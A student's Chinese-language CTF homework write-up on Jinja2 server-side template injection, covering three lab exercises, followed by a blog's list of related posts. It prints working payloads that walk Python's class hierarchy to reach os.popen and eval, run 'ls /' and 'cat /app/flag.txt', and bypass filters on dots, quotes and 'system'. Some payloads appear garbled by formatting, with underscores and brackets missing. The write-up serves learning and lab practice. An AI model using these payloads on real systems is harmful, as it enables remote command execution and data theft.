班级作业笔记报告0x10

SSTI模板注入漏洞

作业1:

SSTI魔术方法

代码审计

加载flag模块中的FLAG,返回源代码,判断/shrine/路由传入的内容,将小括号()过滤为空,设置aaa字符串为黑名单,把黑名单字符设置为None,防止利用,调用render_template_string渲染模板

测试传入{{1+1}}一般输出2

获取flag,传入/shrine/{{config}},或者/shrine/{{url_for.globals'current_app'.config'FLAG'}}

作业2:

SSTI循环语句

典型JinJa2 SSTI注入

代码审计

GET传参,接收name参数,直接拼接使用Template()

方法1:

直接getshell

?name={{request.class.base.subclasses()200.init.globals'os'.popen('ls /').read()}}

执行了find / -type f -name "flag*"看到flag在/app/flag.txt中

继续执行cat /app/flag.txt查看flag

方法2:

第二种方法,也是正解

{% for c in \[\].class.base.subclasses() %}

{% if c.name == 'catch_warnings' %}

{% for b in c.init.globals.values() %}

{% if b.class == {}.class %}

{% if 'eval' in b.keys() %}

{{ b'eval'('import("os").popen("cat /app/flag.txt").read()') }}

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

作业3:

SSTIbypass

代码审计

GET传参id参数,正则匹配过滤system字段、双引号"和英文句号.,没有匹配到直接执行render_template_string函数

方法1:

可以利用上题方法一的解,变一下就行,把点.换成中括号,依旧getshell

?id={{request'__class__''__base__''__subclasses__'()200'__init__''__globals__''os''popen'('ls /')'read'()}}

根目录的flag依旧假的,flag依旧在/app/flag.txt中,不过这需要一点点绕过知识,因为flag文件名字是flag.txt,包含了后端过滤的内容英文句号.,我们可以换成通配符执行命令获取flag

cat /app/flag.txt #会坠机

cat /app/flag*

方法2:

这个是正解的payload,也是一样的效果,只不过我嫌他长但是压不住他细又强

{% for c in \[\]'__cla'+'ss__''__ba'+'se__''__subcla'+'sses__'() %}

{% if c.name == 'catch_warnings' %}

{% for b in c.init.globals.values() %}

{% if b'__cla'+'ss__' == {}'__cla'+'ss__' %}

{% if 'eval' in b.keys() %}

{{ b'eval'('import(\'os\').popen(\'cat flag.txt\').read()') }}

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

个人评价:

SSTI漏洞(服务器端模板注入),触发语言python、Java、Go等,现在主要用的是java,其实是python,本文更侧重python中的SSTI漏洞,作者菜鸡没怎么学,只能说挺好玩的,学起来很轻松,每步都是探索

相关推荐
MartinYeung519 分钟前
[论文学习]隐私保护联邦特徵选择与差分隐私的的工程实践框架
学习
qeen8727 分钟前
【C++】类与对象之类的默认成员函数(二)
android·c语言·开发语言·c++·笔记·学习
CRMEB系统商城32 分钟前
CRMEB多商户系统(Java)v2.3公测版发布
java·开发语言·人工智能·小程序·开源·php
上海云盾-小余34 分钟前
接口高频恶意刷取怎么防?网关限流搭配 WAF 联合防护方案
网络·安全
m0_7360348535 分钟前
存储基础和虚拟化
笔记
Flandern11111 小时前
Pull Requests(PR)
学习·github·pr
修炼室2 小时前
外网环境原生直连校内服务器:基于内网穿透 + SSH 密钥认证的完整实践指南
服务器·ssh·php
nashane2 小时前
HarmonyOS 6学习:JsCrash“闪退”法医指南——从FaultLog堆栈还原崩溃现场的终极手册
学习·华为·harmonyos
for_ever_love__2 小时前
UI学习:UICollectionView瀑布流
学习·ui·ios·objective-c·cocoa
AOwhisky2 小时前
MySQL 学习笔记(第六期):MySQL 备份与恢复
运维·数据库·笔记·学习·mysql·云计算